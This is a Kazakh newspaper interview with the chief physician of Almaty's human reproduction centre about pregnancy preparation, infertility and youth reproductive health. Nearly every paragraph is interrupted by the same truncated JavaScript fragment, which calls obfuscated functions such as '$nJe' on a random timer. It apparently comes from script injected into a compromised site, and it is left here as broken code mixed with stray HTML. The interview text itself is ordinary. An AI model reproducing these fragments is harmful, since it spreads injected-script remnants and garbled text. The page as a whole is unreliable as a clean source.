2022-12-08

Гүлнәр МЫРЗАБЕКОВА, Алматы қалалық адам ұрпағын өрбіту орталығының бас дәрігері: «Бала көтеруге рухани да, физикалық та дайындық қажет»

Spread the love

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; line-height: normal;»>
dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/-1.jpg» width=»418″ height=»277″ alt=»-1″ style=»float: left; margin: 5px;» />

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; line-height: normal;»>

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; line-height: normal;»>

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; line-height: normal;»>Болашақ аналар сіздердің орта­лық­тарыңыздан қандай көмектер ала алады?

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; line-height: normal;»>

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; line-height: normal;»>– Адам репродукциясының орта­лығы 1993 жылдан бері әйелдер мен еркектердің бедеулігін емдеуде жо­ғары деңгейде қызмет көрсетіп келеді. Атап айтқанда, еркектердің репродуктік функцияларының бұзы­луы­на қатысты нақты диагнозын қо­йып емдеу уроандрология, сексо­па­тология, әйел үшін жүктілік мер­зімінің ауыр өтуі, кли­максты ке­зең, гине­кологиялық эндокреноло­гия, отбасын жоспарлау, медико-гене­тика­лық кеңес беру және тұ­қым қуалайтын ауруларды анықтауды жү­зеге асырып келеді. Сондай-ақ, жас­өспірім және жас қыздар гинекологиясы, репродуктік функциялары бұзылған адамдарға стационарлық көмек көрсету, жүктілікті 12 аптаға дейін тоқтату және генетикалық ауыт­қулар анықталған жағдайда 22 аптаға дейін жүктілікті үзу, гинеко­логиялық-лабораториялық зерттеу­лер мен тұқым қуалайтын және тағы басқа ауруларды іште жатқанда ла­бораториялық зерттеулер жүргізу арқылы анықтау сияқты қызметтер көрсетеді.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; line-height: normal;»>
– Жалпы, қазіргі отбасылардың, әсіресе, жас отбасылардың балалы болуға деген дайындығына, жауапкершілігіне көңіліңіз тола ма?
– Өкінішке қарай, көңілім толмайды. Қазіргі отбасын құрған жастардың тек 12-15 пайызы ғана балалы болуға алдын ала дайындалады. Көбіне әйел­дер ешқандай дәрігерлік тексерулерден өтпестен жүкті болып жатады. Ал, бала көтеруге рухани ғана емес, сонымен қатар, физикалық дайындық та қажет. Әйел бала көтерместен үш ай бұрын дайындалуы тиіс. Ерлі-за­йыптыларға әртүрлі витаминдер қа­былдап, профилактикалық тексерулерден өтуге кеңес береміз. Ал, әйел адам гинекологиялық аурулармен қатар тістерін де емдеткені жөн. Сонымен бірге, майлы тағамдарды аз қол­данып, көбіне витаминдер жегені жөн.
– Сәби іштен түрлі синдромдарға шалдығып, ауытқушылыққа ұшырап туылмас үшін болашақ ана не істеуі керек? Бұл жөнінде сіздер оларға кеңестер бересіздер ме?
– Әрине, кеңес береміз. Қазіргі заманның талабына сай әдістерді қол­дана отырып, іште жатқан сәби­дің қалай дамып келе жатқанын анық­тауға мүмкіндік бар. Бірақ, айта кете­тін жайт, әйелдің дүниеге сау ба­ла әкелуі оның жас мөлшері мен жүк­ті болар алдындағы қандай да бір дайындық жұмыстарын жүргізгеніне тығыз байланысты. Сондай-ақ, әйелде вирустың болуы, тератогендік әсері бар препараттарды пайдалану, спирттік ішімдіктер қолдану мен темекі шегу, дұрыс тамақтанбау және зиянды заттармен жұмыс жасау да оның дүниеге сау бала әкелуіне кері әсерін тигізеді. Сондықтан, жүкті әйелдің жоғарыда атап өткен жайттардан сақ болғаны абзал.
– Қазіргі отбасылық өмір дегенде көп айтылып жүрген мәселенің бірі – едеулік және мұның соңғы жылдары артып келе жатқаны айтылады. Осындай мәселеге тап болған отбасылар сіздердің орталықтарыңыздан қандай көмек көре алады?
– Дүниежүзілік Денсаулық Сақтау Ұйымының берген мәліметіне қара­ғанда, отбасын құрған жұбайлар бір жыл бойына бала көтере алмаса, сол отбасы бедеу болып саналады. Ал, біздің орталықта ондай жұбайлар диспансерлік есепке алынып, арнайы дәрігерлер тексеруінен өтіп, ем қабылдайды. Сонымен қатар, өз­дігінен түсік жасаған әйелдер де арнайы есепке алынады.
– Бедеулік емі бар ауру ма? Дұры­сы, одан сақтанудың жолдары қан­дай?
– Соңғы он жылда репродукция саласында медицинаның қарқынды дамуы арқасында бедеулікті түрлі жолдармен емдеуге болады. Алайда, ол бедеуліктің неден болғанына да байланысты. Егер бізден қабылдаған ем бала көтеруге әсер ете алмаса, онда ұрықтандыру орталығына жібереміз.
– Кейінгі кезде әйелдерге қарағанда ерлердің арасында белсіздіктің кө­бейіп келе жатқандығы айтылуда. Дәрігер ретінде бұған не себеп деп ойлайсыз?
– Соңғы кездері жас отбасында ер адамдардың бедеу болуы медициналық және әлеуметтік маңызы бар мәселеге айналып отыр. Бірінші кезекте, ер адамдар арасында белсіздіктің болуына жыныстық қатынас арқылы жұғатын түрлі инфекциялық аурулар себеп болып жатады. Екіншіден, психологиялық стресс, үшіншіден, салауатты өмір салтын сақтамау ер адамдардың бедеу болуына әкелетін жағдайлар болып саналады.
– Сіздерде Жастардың денсаулығы орталығы да жұмыс істейтіні мәлім. Сіздіңше, жастардың денсаулығына қатысты ең алаңдатарлық мәселе қандай?
– Жастардың денсаулығы орта­лығы жастарға денсаулығын жақсар­ту мақсатында жоғары сапалы меди­циналық және психологиялық көмек көрсетіп келеді. Сонымен қатар, салауатты өмір сүруге үйретіп, ақпараттық қызмет көрсетеді. Жасөспірімдер урологтан, балалар гинекологы мен психологтан тегін кеңес ала алады. Сондай-ақ, лабораториялық зерттеу­лер жүргізіледі. Орталықта отбасын жоспарлау кеңсесі жұмыс жасайды. Онда жастар контрацептік дәрілерді қолдану әдісі туралы ақпаратқа қаны­ғып және ол дәрілерді тегін ала алады.
– Әңгімеңізге рақмет.

Әңгімелескен
С. Қалдыбаев {jcomments on}

http://kyzmet-gazeti.kz/

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; line-height: normal;»>

Яндекс.Метрика